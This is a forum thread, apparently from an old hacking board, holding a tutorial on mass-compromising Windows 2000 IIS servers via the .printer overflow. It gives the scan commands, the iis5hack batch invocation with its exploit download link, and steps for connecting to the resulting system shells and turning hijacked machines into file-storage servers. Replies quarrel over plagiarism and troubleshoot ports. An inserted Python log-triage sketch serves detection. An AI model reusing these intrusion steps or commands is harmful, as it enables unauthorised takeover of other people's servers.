
jurk-off
Software Required

SFind.exe (scanner) - http://scanspace.myetang.com/else/sfind.rar
iishack.zip (exploit) - http://www.peckerland.com/software/iishack.zip
SecureCRT (telnet client) - https://secure.vandyke.com/vandyke-...ODUCT=SecureCRT
Ultraedit (text editor) - http://www.ultraedit.com/
FlashFXP (FTP Client) - http://www.flashfxp.com/
ServU (FTP Server) - 3.0, regged, compressed, renamed...

Other stuff required

A good socks proxy server
A good scanstro


Step 1 - Scanning

This is pretty easy, find a fast usa / canadian range (exploit doesn't seem to work for eu versions of win2k), then upload sfind.exe to ur scanstro & use a raw command in FlashFXP (ctrl-R):

site exec sfind.exe -pri 10.100.0.1 10.127.255.254

When ur stro is done scanning u should have a 'sfind.txt', download this & open it in ultraedit, look @ ur results


Step 2.1 - Hacking

For this u need iishack.zip, make sure u read the readme.txt, then upload iis5hack.exe to ur stro.

Go back to ultraedit, delete the 1st line & the last line, then use the search/replace function (ctrl-r) to turn ur results file into a batch file for iis5hack.exe

In the 'find what:' box type 'find .printer hole', in the 'replace with:' box type '80 2 666' - then click 'replace all'. Then, tick the 'regular expressions' box & in the 'find what' box type '^p', type '^piis5hack ' in the replace with box, then click replace all, then click cancel to close the replace box.

Press ctrl-end to go to the end of ur file & u will see a line with just 'iis5hack ' on it, cut this & paste it on the 1st line of the file, where it is missing.

You should now have a file (big as u like ) with

iis5hack 80 2 666

on each line, save as (F12) iistmp.bat

Upload iistmp.bat to ur stro, then use a raw command (ctrl-r in flashfxp):

site exec cmd /c iistmp.bat > iistmp.txt

Wait a while (have a cup of tea, smoke, etc ) - then go back to ur stro & download iistmp.txt

Open iistmp.txt in ultraedit, then search (alt-F3) for 'good luck', make a list in notepad, or in a separate file in ultraedit, of all the ips that have 'good luck' after them


Step 2.2 - Building the stro

You then need to try to connect to these ips with Secure crt, make sure the protocol is set to telnet, the port is set to 45454, & 'use firewall to connect' is ticked (set up a socks proxy before, in options->global options->firewall). Then paste each ip into the 'hostname' box & click connect. You should be able to connect to abt half ur results.

Now u use the same commands u would use to hack a sql stro, this is a bit easier than using sqlexec, because u can paste multiple lines at once. You also have system access, which is nice (better than administrator).

All done? check ur stro is working & post in hacked pubs

myself i don't think this should be in public, if sent to priv, send me with it.....hehe

wanted you guys to know that i've found several with speeds over 8600kbs from ftp.chello.nl



greetz jurk-off


MODERATORS NOTE: I EDITED OUT THE SPECIFIC RANGE AS POSTING REAL IPS IS NOT ALLOWED. PLEASE MUNGE YOUR IPS BEFORE PUTTING THEM IN HERE.
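
Seen from the server side, the activity this thread describes leaves two things to look for: requests for a `.printer` resource in the IIS log, and inbound connections to the listener ports mentioned (666 and 45454). The Python sketch below is an added example, not part of any post in this thread; it assumes W3C extended logging with `c-ip` and `cs-uri-stem` enabled, and the log lines, addresses and connection list are constructed.

```python
from collections import defaultdict

WATCH_PORTS = {666, 45454}  # listener ports named in this thread

# Constructed sample data (documentation addresses, not real traffic).
IIS_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2003-09-03 17:31:02 192.0.2.10 GET /default.htm 200
2003-09-03 17:31:40 198.51.100.7 GET /NULL.printer 500
#Fields: date time c-ip cs-uri-stem sc-status
2003-09-03 17:40:11 203.0.113.4 /x.PRINTER 500
2003-09-03 17:41:00 203.0.113.9 /printers/help.htm 200
truncated line
"""
# Constructed (source IP, destination port) pairs, e.g. from a firewall log.
INBOUND = [("198.51.100.7", 666), ("192.0.2.10", 80), ("203.0.113.9", 45454)]


def printer_requests(log_text):
    """Map client IP -> list of 'date time' stamps for *.printer requests."""
    fields, hits = [], defaultdict(list)
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column order can change mid-file
            continue
        parts = line.split()
        if line.startswith("#") or len(parts) != len(fields):
            continue  # other directives and malformed rows are skipped
        row = dict(zip(fields, parts))
        if row.get("cs-uri-stem", "").lower().endswith(".printer"):
            hits[row.get("c-ip", "?")].append(f"{row.get('date')} {row.get('time')}")
    return dict(hits)


def triage(log_text, inbound, ports=WATCH_PORTS):
    """Split probing sources by whether they also reached a watched port."""
    probes = printer_requests(log_text)
    followed = {src for src, port in inbound if port in ports and src in probes}
    return {"probe_and_shell_port": sorted(followed),
            "probe_only": sorted(set(probes) - followed)}


if __name__ == "__main__":
    print(triage(IIS_LOG, INBOUND))
```

A source in `probe_and_shell_port` is the one to investigate first: it requested a `.printer` resource and then connected to one of the watched ports.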
koko
the link for secureCRT is dead! can u do something?
axl
10x 4 the tut...

but iis .printer is dead!
Ripper
hmm YOU STOLE THIS ONE FROM ME, YOU ASS
this is a little bit USELESS m8... just dumbass style
ComSec
do you have a link to your article ?

Well.....
Ripper
Of course i have a link to my tutorial...:

http://forums.governmentsecurity.org/index...?showtopic=1830

This is just stealing, don't you think?
w00dy
It looks more like elaborating without giving credit
ComSec
thanks ripper.. i see that many exploits each day it's hard to keep track...if you see any more rips..then include a link...makes life easier

thanks bud


jurk-off...can you explain why you posted this article without crediting ripper ?

.
jurk-off
sjeez i'm not the only one with this tutor, i got it from a friend of mine.


now let ripper explain how he gets his tutor but plz don't think i'm just "ripping" his post cauze that would be the most stupid thing on earth..

i just have this tutor and didn't see ripper's tutor!!!
ComSec
ok...it's getting more complicated with each reply...sort it between you via the PM system....cheers

============



on a footnote to ALL....any articles you reproduce here...make sure you include the Author's name, credits and links he may provide....same goes for programs and code.

if you're not sure then PM an admin member

thanks guys keep up the great work



============

mumiak
is this bug still alive?
I have got lots of good luck but I can't connect to them.
Could someone post that SecureCRT telnet client, I'm using standard windows telnet. And which port should I connect, 666 or 45454?
Thanks for help...
Neo_
Hello,
I think there is a little mistake.
If i do

iis5hack 192.168.45.65 80 2 666

i have to do

telnet 192.168.45.65 666 and not 45454

I have had 2 Good Luck!!! but i can't telnet.
Igrikk
nice tut
10x for sharing
virus
QUOTE (mumiak @ Sep 3 2003, 05:33 PM)
is this bug still alive?

yeh the bug's still alive and crawling up me pants. I guess the pesticide didn't work that well